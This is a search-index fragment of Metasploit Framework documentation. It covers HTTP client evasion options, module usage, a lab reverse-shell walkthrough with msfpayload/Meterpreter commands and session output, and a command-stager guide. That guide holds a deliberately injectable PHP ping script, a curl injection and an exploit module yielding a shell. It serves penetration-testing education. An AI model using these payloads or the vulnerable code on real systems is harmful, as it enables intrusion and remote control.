    "content": "Here are examples of how to actually speak to an HTTP server with either #request_cgi or #request_raw: . ** request_cgi . cli = Rex::Proto::Http::Client.new(rhost), cli.connect req = cli.request_cgi({'uri'=&amp;gt;'/'}) res = cli.send_recv(req) cli.close . ** request_raw . cli = Rex::Proto::Http::Client.new(rhost), cli.connect req = cli.request_raw({'uri'=&amp;gt;'/'}) res = cli.send_recv(req) cli.close . ",
    "url": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-rex-proto-http-client.html#sending-an-http-request",
    "relUrl": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-rex-proto-http-client.html#sending-an-http-request"
  },"284": {
    "doc": "How to send an HTTP request using Rex Proto Http Client",
    "title": "Configuring advanced options",
    "content": "Evasion Options . Rex::Proto::Http::Client also comes with its own collection of evasion options. You can set them either when you’re asking Rex::Proto::Http::ClientRequest to make the HTTP request, or you can set them with a #set_config method. The main difference is that if you are using #set_config, you should make these options user-configurable. | Option | Data type | Default | Known configurable option | . | encode_params | Boolean | true | N/A | . | encode | Boolean | false | N/A | . | uri_encode_mode | String | hex-normal | HTTP::uri_encode_mode | . | uri_encode_count | Fixnum | 1 | N/A | . | uri_full_url | Boolean | false | HTTP::uri_full_url | . | pad_method_uri_count | Fixnum | 1 | HTTP::pad_method_uri_count | . | pad_uri_version_count | Fixnum | 1 | HTTP::pad_uri_version_count | . | pad_method_uri_type | String | space | HTTP::pad_method_uri_type | . | pad_uri_version_type | String | space | HTTP::pad_uri_version_type | . | method_random_valid | Boolean | false | HTTP::method_random_valid | . | method_random_invalid | Boolean | false | HTTP::method_random_invalid | . | method_random_case | Boolean | false | HTTP::method_random_case | . | version_random_valid | Boolean | false | N/A | . | version_random_invalid | Boolean | false | N/A | . | version_random_case | Boolean | false | N/A | . | uri_dir_self_reference | Boolean | false | HTTP::uri_dir_self_reference | . | uri_dir_fake_relative | Boolean | false | HTTP::uri_dir_fake_relative | . | uri_use_backslashes | Boolean | false | HTTP::uri_use_backslashes | . | pad_fake_headers | Boolean | pad_fake_headers | HTTP::pad_fake_headers | . | pad_fake_headers_count | Fixnum | 16 | HTTP::pad_fake_headers_count | . | pad_get_params | Boolean | false | HTTP::pad_get_params | . | pad_get_params_count | Boolean | 8 | HTTP::pad_get_params_count | . | pad_post_params | Boolean | false | HTTP::pad_post_params | . | pad_post_params_count | Fixnum | 8 | HTTP::pad_post_params_count | . | uri_fake_end | Boolean | false | HTTP::uri_fake_end | . | uri_fake_params_start | Boolean | false | HTTP::uri_fake_params_start | . | header_folding | Boolean | false | HTTP::header_folding | . | chunked_size | Fixnum | 0 | N/A | . NTLM Options . HTTP authentication is automatic in Rex::Proto::Http::Client, and when it comes to the NTLM provider, it gets its own options. You MUST use the #set_config method to set them: . | Option | Data type | Default | Known configurable option | . | usentlm2_session | Boolean | true | NTLM::UseNTLM2_session | . | use_ntlmv2 | Boolean | true | NTLM::UseNTLMv2 | . | send_lm | Boolean | true | NTLM::SendLM | . | send_ntlm | Boolean | true | NTLM::SendNTLM | . | SendSPN | Boolean | true | NTLM::SendSPN | . | UseLMKey | Boolean | false | NTLM::UseLMKey | . | domain | String | WORKSTATION | DOMAIN | . | DigestAuthIIS | Boolean | true | DigestAuthIIS | . Note: “Known configuration options” means there is a datastore option for it from HttpClient. If you can’t use HttpClient, then you will have to consider register them yourself. ",
    "url": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-rex-proto-http-client.html#configuring-advanced-options",
    "relUrl": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-rex-proto-http-client.html#configuring-advanced-options"
  },"285": {
    "doc": "How to send an HTTP request using Rex Proto Http Client",
    "title": "URI Parsing",
    "content": "Rex::Proto::Http::Client actually does not support URI parsing, so for URI format validation and normalization, you are on your own, and you should probably do it. For URI format validation, we recommend using Ruby’s URI module. You can use HttpClient’s #target_uri method as an example. For URI normalization, we recommend HttpClient’s #normalize_uri method as an example. ",
    "url": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-rex-proto-http-client.html#uri-parsing",
    "relUrl": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-rex-proto-http-client.html#uri-parsing"
  },"286": {
    "doc": "How to send an HTTP request using Rex Proto Http Client",
    "title": "Full Example",
    "content": "cli = Rex::Proto::Http::Client.new(rhost, rport, {}, ssl, ssl_version, proxies, user, pass) cli.set_config( 'vhost' =&amp;gt; vhost, 'agent' =&amp;gt; datastore['UserAgent'], 'uri_encode_mode' =&amp;gt; datastore['HTTP::uri_encode_mode'], 'uri_full_url' =&amp;gt; datastore['HTTP::uri_full_url'], 'pad_method_uri_count' =&amp;gt; datastore['HTTP::pad_method_uri_count'], 'pad_uri_version_count' =&amp;gt; datastore['HTTP::pad_uri_version_count'], 'pad_method_uri_type' =&amp;gt; datastore['HTTP::pad_method_uri_type'], 'pad_uri_version_type' =&amp;gt; datastore['HTTP::pad_uri_version_type'], 'method_random_valid' =&amp;gt; datastore['HTTP::method_random_valid'], 'method_random_invalid' =&amp;gt; datastore['HTTP::method_random_invalid'], 'method_random_case' =&amp;gt; datastore['HTTP::method_random_case'], 'uri_dir_self_reference' =&amp;gt; datastore['HTTP::uri_dir_self_reference'], 'uri_dir_fake_relative' =&amp;gt; datastore['HTTP::uri_dir_fake_relative'], 'uri_use_backslashes' =&amp;gt; datastore['HTTP::uri_use_backslashes'], 'pad_fake_headers' =&amp;gt; datastore['HTTP::pad_fake_headers'], 'pad_fake_headers_count' =&amp;gt; datastore['HTTP::pad_fake_headers_count'], 'pad_get_params' =&amp;gt; datastore['HTTP::pad_get_params'], 'pad_get_params_count' =&amp;gt; datastore['HTTP::pad_get_params_count'], 'pad_post_params' =&amp;gt; datastore['HTTP::pad_post_params'], 'pad_post_params_count' =&amp;gt; datastore['HTTP::pad_post_params_count'], 'uri_fake_end' =&amp;gt; datastore['HTTP::uri_fake_end'], 'uri_fake_params_start' =&amp;gt; datastore['HTTP::uri_fake_params_start'], 'header_folding' =&amp;gt; datastore['HTTP::header_folding'], 'usentlm2_session' =&amp;gt; datastore['NTLM::UseNTLM2_session'], 'use_ntlmv2' =&amp;gt; datastore['NTLM::UseNTLMv2'], 'send_lm' =&amp;gt; datastore['NTLM::SendLM'], 'send_ntlm' =&amp;gt; datastore['NTLM::SendNTLM'], 'SendSPN' =&amp;gt; datastore['NTLM::SendSPN'], 'UseLMKey' =&amp;gt; datastore['NTLM::UseLMKey'], 'domain' =&amp;gt; datastore['DOMAIN'], 'DigestAuthIIS' =&amp;gt; datastore['DigestAuthIIS'] ) cli.connect req = cli.request_cgi({'uri'=&amp;gt;'/'}) res = cli.send_recv(req) cli.close . ",
    "url": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-rex-proto-http-client.html#full-example",
    "relUrl": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-rex-proto-http-client.html#full-example"
  },"287": {
    "doc": "How to send an HTTP request using Rex Proto Http Client",
    "title": "How to send an HTTP request using Rex Proto Http Client",
    "content": "Note: This documentation may need to be vetted. ",
    "url": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-rex-proto-http-client.html",
    "relUrl": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-rex-proto-http-client.html"
  },"288": {
    "doc": "How to use a Metasploit module appropriately",
    "title": "Loading a Metasploit module",
    "content": "Each Metasploit module comes with some metadata that explains what it’s about, and to see that you must load it first. An example: . msf &amp;gt; use exploit/windows/smb/ms08_067_netapi . ",
    "url": "/docs/using-metasploit/basics/how-to-use-a-metasploit-module-appropriately.html#loading-a-metasploit-module",
    "relUrl": "/docs/using-metasploit/basics/how-to-use-a-metasploit-module-appropriately.html#loading-a-metasploit-module"
  },"289": {
    "doc": "How to use a Metasploit module appropriately",
    "title": "Read the module description and references",
    "content": "This may sound surprising, but sometimes we get asked questions that are already explained in the module. You should always look for the following in the description or the references it provides before deciding whether it’s appropriate to use the exploit or not: . | What products and versions are vulnerable: This is the most basic thing you should know about a vulnerability. | What type of vulnerability and how it works: Basically, you are learning the exploit’s side-effects. For example, if you’re exploiting a memory corruption, if it fails due to whatever reason, you may crash the service. Even if it doesn’t, when you’re done with the shell and type “exit”, it’s still possible to crash it too. High level bugs are generally safer, but not 100%. For example, maybe it needs to modify a config file or install something that can cause the application to be broken, and may become permanent. | Which ones have been tested: When a module is developed, usually the exploit isn’t tested against every single setup if there are too many. Usually the developers will just try to test whatever they can get their hands on. So if your target isn’t mentioned here, keep in mind there is no guarantee it’s going to work 100%. The safest thing to do is to actually recreate the environment your target has, and test the exploit before hitting the real thing. | What conditions the server must meet in order to be exploitable: Quite often, a vulnerability requires multiple conditions to be exploitable. In some cases you can rely on the exploit’s check command, because when Metasploit flags something as vulnerable, it actually exploited the bug. For browser exploits using the BrowserExploitServer mixin, it will also check exploitable requirements before loading the exploit. But automation isn’t always there, so you should try to find this information before running that “exploit” command. Sometimes it’s just common sense, really. For example: a web application’s file upload feature might be abused to upload a web-based backdoor, and stuff like that usually requires the upload folder to be accessible for the user. If your target doesn’t meet the requirement(s), there is no point to try. | . You can use the info command to see the module’s description: . msf exploit(ms08_067_netapi) &amp;gt; info . ",
    "url": "/docs/using-metasploit/basics/how-to-use-a-metasploit-module-appropriately.html#read-the-module-description-and-references",
    "relUrl": "/docs/using-metasploit/basics/how-to-use-a-metasploit-module-appropriately.html#read-the-module-description-and-references"
  },"290": {
    "doc": "How to use a Metasploit module appropriately",
    "title": "Read the target list",
    "content": "Every Metasploit exploit has a target list. Basically this is a list of setups the developers have tested before making the exploit publicly available. If your target machine isn’t on the list, it’s better to assume the exploit has never been tested on that particular setup. If the exploit supports automatic targeting, it is always the first item on the list (or index 0). The first item is also almost always the default target. What this means is that you should never assume the exploit will automatically select a target for you if you’ve never used it before, and that the default setup might not be the one you’re testing against. The “show options” command will tell you which target is selected. For example: . msf exploit(ms08_067_netapi) &amp;gt; show options . The “show targets” command will give you a list of targets supported: . msf exploit(ms08_067_netapi) &amp;gt; show targets . ",
    "url": "/docs/using-metasploit/basics/how-to-use-a-metasploit-module-appropriately.html#read-the-target-list",
    "relUrl": "/docs/using-metasploit/basics/how-to-use-a-metasploit-module-appropriately.html#read-the-target-list"
  },"291": {
    "doc": "How to use a Metasploit module appropriately",
    "title": "Check all the options",
    "content": "All Metasploit modules come with most datastore options pre-configured. However, they may not be suitable for the particular setup you’re testing. To do a quick double-check, usually the “show options” command is enough: . msf exploit(ms08_067_netapi) &amp;gt; show options . However, “show options” only shows you all the basic options. It does not show you the evasive or advanced options (try “show evasion” and “show advanced”), the command you should use that shows you all the datastore options is actually the “set” command: . msf exploit(ms08_067_netapi) &amp;gt; set . ",
    "url": "/docs/using-metasploit/basics/how-to-use-a-metasploit-module-appropriately.html#check-all-the-options",
    "relUrl": "/docs/using-metasploit/basics/how-to-use-a-metasploit-module-appropriately.html#check-all-the-options"
  },"292": {
    "doc": "How to use a Metasploit module appropriately",
    "title": "Find the module’s pull request",
    "content": "The Metasploit repository is hosted on GitHub, and the developers/contributors rely on it heavily for development. Before a module is made public, it is submitted as a pull request for final testing and review. In there, you will find pretty much everything you need to know about the module, and probably things you won’t learn from reading the module’s description or some random blog post. The information is like gold, really. Things you might learn from reading a pull request: . | Steps on how to set up the vulnerable environment. | What targets were actually tested. | How the module is meant to be used. | How the module was verified. | What problems were identified. Problems you might want to know. | Demonstrations. | Other surprises. | . There are a few ways to find the pull request of the module you’re using: . | Via info -d in msfconsole: If you generate a personal access token and set it in your shell environment with export GITHUB_OAUTH_TOKEN your_token, the builtin documentation will show relevant pull requests for the current module. | Via the pull request number: If you actually know the pull request number, this is the easiest. Simply go: . | . https://github.com/rapid7/metasploit-framework/pull/[PULL REQUEST NUMBER HERE] . | Via filters: This is most likely how you find the pull request. First off, you should go here: https://github.com/rapid7/metasploit-framework/pulls. At the top, you will see a search input box with the default filters: is:pr is:open. These default ones mean you’re looking at pull requests, and you’re looking at the ones that are still pending - still waiting to be merged to Metasploit. Well, since you’re finding the one that’s already merged, you should do these: | . | Click on “Closed”. | Select label “module”. | In the search box, enter additional keywords related to the module. The module’s title probably provides the best keywords. | . Note: If the module was written before Nov 2011, you WILL NOT find the pull request for it. ",
    "url": "/docs/using-metasploit/basics/how-to-use-a-metasploit-module-appropriately.html#find-the-modules-pull-request",
    "relUrl": "/docs/using-metasploit/basics/how-to-use-a-metasploit-module-appropriately.html#find-the-modules-pull-request"
  },"293": {
    "doc": "How to use a Metasploit module appropriately",
    "title": "How to use a Metasploit module appropriately",
    "content": "As an user, one thing we love Metasploit the most is it allows something really technically difficult to understand or engineer into something really easy to use, literally within a few clicks away to make you look like Neo from the Matrix. It makes hacking super easy. However, if you’re new to Metasploit, know this: Nobody makes their first jump. You are expected to make mistakes, sometimes small, sometimes catastrophic… hopefully not. You’re very likely to fall on your face with your first exploit, just like Neo. Obviously, to become The One you must learn to use these modules appropriately, and we will teach you how. In this documentation, understand that we require you no exploit development knowledge. Some programming knowledge would be nice, of course. The whole point is that there is actually “homework” before using an exploit, and you should always do your homework. ",
    "url": "/docs/using-metasploit/basics/how-to-use-a-metasploit-module-appropriately.html",
    "relUrl": "/docs/using-metasploit/basics/how-to-use-a-metasploit-module-appropriately.html"
  },"294": {
    "doc": "How to use a reverse shell in Metasploit",
    "title": "On this page",
    "content": ". | List of Metasploit reverse shells . | Windows common reverse shell | Linux common reverse shell | . | When to use a reverse shell | When a reverse shell isn’t needed | How to set up for a reverse shell during payload generation | Demonstration . | Step 1: Generate the executable payload | Step 2: Copy the executable payload to box B | Step 3: Set up the payload handler on box A | Step 4: Double-click on the malicious executable | Step 5: View the meterpreter/payload session on box A | . | . There are two popular types of shells: bind and reverse. Bind shell - Opens up a new service on the target machine and requires the attacker to connect to it to get a session. Reverse shell - A reverse shell is also known as a connect-back. It requires the attacker to set up a listener first on his box, the target machine acts as a client connecting to that listener, and then finally, the attacker receives the shell. You can learn more about the primary use of payloads in the 5.2.4 Selecting the Payload section of the old Metasploit Users Guide. This article goes over using a reverse shell to get a session. ",
    "url": "/docs/using-metasploit/basics/how-to-use-a-reverse-shell-in-metasploit.html#on-this-page",
    "relUrl": "/docs/using-metasploit/basics/how-to-use-a-reverse-shell-in-metasploit.html#on-this-page"
  },"295": {
    "doc": "How to use a reverse shell in Metasploit",
    "title": "List of Metasploit reverse shells",
    "content": "To get a list of reverse shells, use the msfpayload command. B ./msfpayload -l |grep reverse . As a rule of thumb, always pick a Meterpreter, because it currently provides better support of the post-exploitation Metasploit has to offer. For example, railgun, post modules, different meterpreter commands. Windows common reverse shell . In Windows, the most commonly used reverse shell is windows/meterpreter/reverse. You can also use windows/meterpreter/reverse_http or windows/meterpreter/reverse_https because their network traffic appears a little bit less abnormal. Linux common reverse shell . In Linux, you can try linux/x86/meterpreter/reverse_tcp, or the 64-bit one. The linux/x86/shell_reverse_tcp has been the most stable. ",
    "url": "/docs/using-metasploit/basics/how-to-use-a-reverse-shell-in-metasploit.html#list-of-metasploit-reverse-shells",
    "relUrl": "/docs/using-metasploit/basics/how-to-use-a-reverse-shell-in-metasploit.html#list-of-metasploit-reverse-shells"
  },"296": {
    "doc": "How to use a reverse shell in Metasploit",
    "title": "When to use a reverse shell",
    "content": "If you find yourself in one of the following scenarios, then you should consider using a reverse shell: . | The target machine is behind a different private network. | The target machine’s firewall blocks incoming connection attempts to your bindshell. | Your payload is unable to bind to the port it wants due to whatever reason. | You can’t decide what to choose. | . ",
    "url": "/docs/using-metasploit/basics/how-to-use-a-reverse-shell-in-metasploit.html#when-to-use-a-reverse-shell",
    "relUrl": "/docs/using-metasploit/basics/how-to-use-a-reverse-shell-in-metasploit.html#when-to-use-a-reverse-shell"
  },"297": {
    "doc": "How to use a reverse shell in Metasploit",
    "title": "When a reverse shell isn’t needed",
    "content": "Generally speaking, if you can backdoor an existing service, you may not need a reverse shell. For example, if the target machine is already running an SSH server, then you can try adding a new user to it and use that. If the target machine is running a web server that supports a server-side programming language, then you can leave a backdoor in that language. For example, many Apache servers support PHP, then you can use a PHP “web shell”. IIS servers usually support ASP or ASP.net. The Metasploit Framework offers payloads in all these languages and many others. This also applied to VNC, remote desktop, SMB (psexec), or other remote admin tools, etc. ",
    "url": "/docs/using-metasploit/basics/how-to-use-a-reverse-shell-in-metasploit.html#when-a-reverse-shell-isnt-needed",
    "relUrl": "/docs/using-metasploit/basics/how-to-use-a-reverse-shell-in-metasploit.html#when-a-reverse-shell-isnt-needed"
  },"298": {
    "doc": "How to use a reverse shell in Metasploit",
    "title": "How to set up for a reverse shell during payload generation",
    "content": "When you generate a reverse shell with either msfpayload or msfvenom, you must know how to configure the following: . | LHOST - This is the IP address you want your target machine to connect to. If you’re in a local area network, it is unlikely your target machine can reach you unless you both are on the same network. In that case, you will have to find out your public-facing IP address, and then configure your network to port-forward that connection to your box. LHOST should not be “localhost”, or “0.0.0.0”, or “127.0.0.1”, because if you do, you’re telling the target machine to connect to itself (or it may not work at all). | LPORT - This the port you want your target machine to connect to. | . When you set up a listener for the reverse shell, you also at least need to configure LHOST and LPORT, but slightly different meanings (different perspective): . | LHOST - This is the IP address you want your listener to bind to. | LPORT - This is the port you want your listener to bind to. | . You should make sure the listener has started first before executing the reverse shell. ",
    "url": "/docs/using-metasploit/basics/how-to-use-a-reverse-shell-in-metasploit.html#how-to-set-up-for-a-reverse-shell-during-payload-generation",
    "relUrl": "/docs/using-metasploit/basics/how-to-use-a-reverse-shell-in-metasploit.html#how-to-set-up-for-a-reverse-shell-during-payload-generation"
  },"299": {
    "doc": "How to use a reverse shell in Metasploit",
    "title": "Demonstration",
    "content": "In this demonstration, we have two boxes: . Box A: . | The attacker’s box that receives the payload session | IP is: 192.168.1.123 (ifconfig) | On the same network as the victim machine | . Box B: . | The “victim” machine | Windows XP | IP is: 192.168.1.80 (ipconfig) | On the same network as the attacker machine | For testing purposes, no antivirus enabled. | For testing purposes, no firewall enabled, either. | . Step 1: Generate the executable payload . On the attacker’s box, run msfpayload or msfvenom: . $ ./msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.123 lport=4444 X &amp;gt; /tmp/iambad.exe Created by msfpayload (http://www.metasploit.com). Payload: windows/meterpreter/reverse_tcp Length: 287 Options: {\"LHOST\"=&amp;gt;\"192.168.1.123\", \"LPORT\"=&amp;gt;\"4444\"} . Step 2: Copy the executable payload to box B . Box B is the victim machine. Step 3: Set up the payload handler on box A . Box A is the attacker machine. $ ./msfconsole -q msf &amp;gt; use exploit/multi/handler msf exploit(handler) &amp;gt; set payload windows/meterpreter/reverse_tcp payload =&amp;gt; windows/meterpreter/reverse_tcp msf exploit(handler) &amp;gt; set lhost 192.168.1.123 lhost =&amp;gt; 192.168.1.123 msf exploit(handler) &amp;gt; set lport 4444 lport =&amp;gt; 4444 msf exploit(handler) &amp;gt; run [*] Started reverse handler on 192.168.1.123:4444 [*] Starting the payload handler... Step 4: Double-click on the malicious executable . This step requires no further explanation. Step 5: View the meterpreter/payload session on box A . $ ./msfconsole -q msf &amp;gt; use exploit/multi/handler msf exploit(handler) &amp;gt; set payload windows/meterpreter/reverse_tcp payload =&amp;gt; windows/meterpreter/reverse_tcp msf exploit(handler) &amp;gt; set lhost 192.168.1.123 lhost =&amp;gt; 192.168.1.123 msf exploit(handler) &amp;gt; set lport 4444 lport =&amp;gt; 4444 msf exploit(handler) &amp;gt; run [*] Started reverse handler on 192.168.1.123:4444 [*] Starting the payload handler... [*] Sending stage (770048 bytes) to 192.168.1.80 [*] Meterpreter session 1 opened (192.168.1.123:4444 -&amp;gt; 192.168.1.80:1138) at 2014-10-22 19:03:43 -0500 meterpreter &amp;gt; . The meterpreter prompt means you are currently interacting with the payload. ",
    "url": "/docs/using-metasploit/basics/how-to-use-a-reverse-shell-in-metasploit.html#demonstration",
    "relUrl": "/docs/using-metasploit/basics/how-to-use-a-reverse-shell-in-metasploit.html#demonstration"
  },"300": {
    "doc": "How to use a reverse shell in Metasploit",
    "title": "How to use a reverse shell in Metasploit",
    "content": " ",
    "url": "/docs/using-metasploit/basics/how-to-use-a-reverse-shell-in-metasploit.html",
    "relUrl": "/docs/using-metasploit/basics/how-to-use-a-reverse-shell-in-metasploit.html"
  },"301": {
    "doc": "How to use command stagers",
    "title": "The Vulnerability Test Case",
    "content": "The best way to explain how to use a command stager is probably by demonstrating it. Here we have a command injection vulnerability in example PHP code, something silly you actually might see in enterprise-level software. The bug is that you can inject additional system commands in the system call for ping: . &amp;lt;?php if ( isset($_GET[\"ip\"]) ) { $output = system(\"ping -c 1 \" . $_GET[\"ip\"]); die($output); } ?&amp;gt; &amp;lt;html&amp;gt; &amp;lt;body&amp;gt; &amp;lt;form action = \"ping.php\" method = \"GET\"&amp;gt; IP to ping: &amp;lt;input type = \"text\" name = \"ip\" /&amp;gt; &amp;lt;input type = \"submit\" /&amp;gt; &amp;lt;/form&amp;gt; &amp;lt;/body&amp;gt; &amp;lt;/html&amp;gt; . Place the above PHP script (ping.php) on an Ubuntu + Apache + PHP server. Make sure your Apache server isn’t exposed to the Internet! . Under normal usage, this is how the script behaves - it just pings the host you specify, and shows you the output: . $ curl \"http://192.168.1.203/ping.php?ip=127.0.0.1\" PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data. 64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.017 ms --- 127.0.0.1 ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms rtt min/avg/max/mdev = 0.017/0.017/0.017/0.000 ms rtt min/avg/max/mdev = 0.017/0.017/0.017/0.000 ms . OK, now we can abuse that a little and execute another command (id): . $ curl \"http://192.168.1.203/ping.php?ip=127.0.0.1+%26%26+id\" PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data. 64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.020 ms --- 127.0.0.1 ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms rtt min/avg/max/mdev = 0.020/0.020/0.020/0.000 ms uid=33(www-data) gid=33(www-data) groups=33(www-data) uid=33(www-data) gid=33(www-data) groups=33(www-data) . See the www-data? That is the output for the second command we asked the script to execute. By doing that, we can also do something even more nasty - like writing a Meterpreter payload onto the target system, and execute it. ",
    "url": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#the-vulnerability-test-case",
    "relUrl": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#the-vulnerability-test-case"
  },"302": {
    "doc": "How to use command stagers",
    "title": "The Msf::Exploit::CmdStager Mixin",
    "content": "Now let’s talk about how to use a command stager to exploit the above script. There are a couple of steps you need to do: . 1. Include the Msf::Exploit::CmdStager mixin . Although there are many flavors of mixins/stagers, you only need to include Msf::Exploit::CmdStager when writing a Metasploit exploit. The mixin is basically an interface to all command stagers: . include Msf::Exploit::CmdStager . 2. Declare your flavors . To tell Msf::Exploit::CmdStager what flavors you want, you can add the CmdStagerFlavor info in the module’s metadata. Either from the common level, or the target level. Multiple flavors are allowed. Remember that different flavors have different approaches to staging the payload for execution. Some flavors will break the payload apart and embed the payload data into multiple echo or printf commands to write it to disk; others like wget and curl execute a command to retrieve the payload via network connection. Your chosen flavor will be determined by the availability of a given command on the target system, the size of the command, the size of the payload, the ability to call out on the network, and the security posture of the target. An example of setting flavors for a specific target: . 'Targets' =&amp;gt; [ [ 'Windows', { 'Arch' =&amp;gt; [ ARCH_X86_64, ARCH_X86 ], 'Platform' =&amp;gt; 'win', 'CmdStagerFlavor' =&amp;gt; [ 'certutil', 'vbs' ] } ] ] . Or, you can pass this info to the execute_cmdstager method (see Step 4 to begin). execute_cmdstager(flavor: :vbs) . However, it is best to set the compatible list of flavors in CmdStagerFlavor, rather than hard-coding the flavor in the execute_cmdstager method call, as this allows the operator to choose a flavor from msfconsole with set CmdStager::flavor . 3. Create the execute_command method . You also must create a def execute_command(cmd, opts = {}) method in your module. This is how you define how to execute a command on the target. The parameter cmd is the command to execute. When writing the execute_cmd method, remember that a great deal of work might already be done for you. Here is an example of a web host that executes a command as part of a request: . def execute_command(cmd, _opts = {}) populate_values if @sid.nil? || @token.nil? uri = datastore['URIPATH'] + '/vendor/htmlawed/htmlawed/htmLawedTest.php' send_request_cgi({ 'method' =&amp;gt; 'POST', 'uri' =&amp;gt; normalize_uri(uri), 'cookie' =&amp;gt; 'sid=' + @sid, 'ctype' =&amp;gt; 'application/x-www-form-urlencoded', 'encode_params' =&amp;gt; true, 'vars_post' =&amp;gt; { 'token' =&amp;gt; @token, 'text' =&amp;gt; cmd, 'hhook' =&amp;gt; 'exec', 'sid' =&amp;gt; @sid } }) end . Since the command is encapsulated within a request, it will be encoded for us. When building and debugging an execute_command method that uses web requests, remember that set httptrace true will automatically display the http traffic as it is sent and received. 4. Decide on the supported payloads . CmdStagers are intended to support payloads that are uploaded, saved to disk, and launched, but many of the payloads in Metasploit Framework do not need to be saved to disk; these payloads are ARCH_CMD payloads that rely on software already present on the target system like netcat, bash, python, or ssh. Depending on whether the payload needs to be saved to disk or not changes what payloads are supported and how we launch the payload, so we must provide the user the ability to pick between the two. The best way to let the user decide what kind of payload to use is by defining separate targets . Here is an example targets section from a command injection module: . 'Targets' =&amp;gt; [ [ 'Unix Command', { 'Platform' =&amp;gt; 'unix', 'Arch' =&amp;gt; ARCH_CMD, 'Type' =&amp;gt; :unix_cmd, 'DefaultOptions' =&amp;gt; { 'PAYLOAD' =&amp;gt; 'cmd/unix/python/meterpreter/reverse_tcp', 'RPORT' =&amp;gt; 9000 } } ], [ 'Linux (Dropper)', { 'Platform' =&amp;gt; 'linux', 'Arch' =&amp;gt; [ARCH_X64], 'DefaultOptions' =&amp;gt; { 'PAYLOAD' =&amp;gt; 'linux/x64/meterpreter/reverse_tcp' }, 'Type' =&amp;gt; :linux_dropper } ], . The first target is the ARCH_CMD target and unix platform. This allows the user to select any payload that starts with cmd/unix. These payloads do not need to be saved to disk because they are “just” a command, rather than an executable file. As such, they can be contained and launched within a command line string. The second is ARCH_X64 and the platform is linux; this lets us choose any payload that starts with linux/x64 and includes binary elf payloads. These payload types must be saved to disk before they can be launched, and as such, you will often see this second type of payload referred to as a ‘dropper’ because the file must be ‘dropped’ to the disk before it can be executed. In each of the targets above, we’ve selected a default payload we know will work. 4. Executing a payload As we said earlier, the way a payload is executed depends on the payload type. By including Msf::Exploit::CmdStager you are given access to a method called execute_cmdstager. execute_cmdstager makes a list of required commands to encode, upload, save, decode, and execute your payload, then uses the execute_command method you defined earlier to run each command on the target. Unfortunately, we just mentioned not all payloads need to be saved to disk. In the case of a payload that does not need to be saved to disk, we only need to call execute_command. This problem of payload/method juggling sounds far worse than it is. Below is a quick example of how simple the exploit method will become if you have properly defined your targets as discussed in step 3: . def exploit print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") case target['Type'] when :unix_cmd execute_command(payload.encoded) when :linux_dropper execute_cmdstager end end . That’s it. If the user selects an ARCH_CMD payload, we call the execute_command method on the payload because as we said earlier, these payloads will execute within a single command. If the user has selected a dropped payload like ARCH_X64 or ARCH_X86, then we call execute_cmdstager which figures out the series of commands necessary to save the file to disk and launch it based on the flavor and max size you set earlier. Over the years, we have also learned that these options are quite handy when calling execute_cmdstager: . | flavor - You can specify what command stager (flavor) to use from here. | delay - How much time to delay between each command execution. 0.25 is default. | linemax - Maximum number of characters per command. 2047 is default. | . Msf::Exploit::CmdStager Template . At the minimum, this is how your exploit should start when you’re using the CmdStager mixin: . class MetasploitModule &amp;lt; Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::CmdStager def initialize(info = {}) super( update_info( info, 'Name' =&amp;gt; 'Command Injection Using CmdStager', 'Description' =&amp;gt; %q{ This exploits a command injection using the command stager. }, 'License' =&amp;gt; MSF_LICENSE, 'Author' =&amp;gt; [ 'sinn3r' ], 'References' =&amp;gt; [ [ 'URL', 'http://metasploit.com' ] ], 'Platform' =&amp;gt; 'linux', 'Targets' =&amp;gt; [ [ 'Linux', {} ] ], 'Payload' =&amp;gt; { 'BadChars' =&amp;gt; \"\\x00\" }, 'CmdStagerFlavor' =&amp;gt; [ 'printf' ], 'Privileged' =&amp;gt; false, 'DisclosureDate' =&amp;gt; '2016-06-10', 'DefaultTarget' =&amp;gt; 0 ) ) end def execute_command(cmd, opts = {}) # calls some method to inject cmd to the vulnerable code. end def exploit print_status('Exploiting...') execute_cmdstager end end . As you can see, we have chosen the “printf” flavor as our command stager. We will explain more about this later, but basically what it does is it writes our payload to /tmp and executes it. Now let’s modify the execute_command method and get code execution against the test case. Based on the PoC, we know that our injection string should look like this: . 127.0.0.1+%26%26+[Malicious commands] . We do that in execute_command using HttpClient. Notice there is actually some bad character filtering involved to get the exploit working correctly, which is expected: . def filter_bad_chars(cmd) cmd.gsub!(/chmod \\+x/, 'chmod 777') cmd.gsub!(/;/, ' %26%26 ') cmd.gsub!(/ /, '+') end def execute_command(cmd, _opts = {}) send_request_cgi( { 'method' =&amp;gt; 'GET', 'uri' =&amp;gt; '/ping.php', 'encode_params' =&amp;gt; false, 'vars_get' =&amp;gt; { 'ip' =&amp;gt; \"127.0.0.1+%26%26+#{filter_bad_chars(cmd)}\" } } ) end def exploit print_status('Exploiting...') execute_cmdstager end . And let’s run that, we should have a shell: . msf exploit(cmdstager_demo) &amp;gt; run [*] Started reverse TCP handler on 10.6.0.92:4444 [*] Exploiting... [*] Transmitting intermediate stager for over-sized stage...(105 bytes) [*] Sending stage (1495599 bytes) to 10.6.0.92 [*] Meterpreter session 1 opened (10.6.0.92:4444 -&amp;gt; 10.6.0.92:51522) at 2016-06-10 11:51:03 -0500 . ",
    "url": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#the-msfexploitcmdstager-mixin",
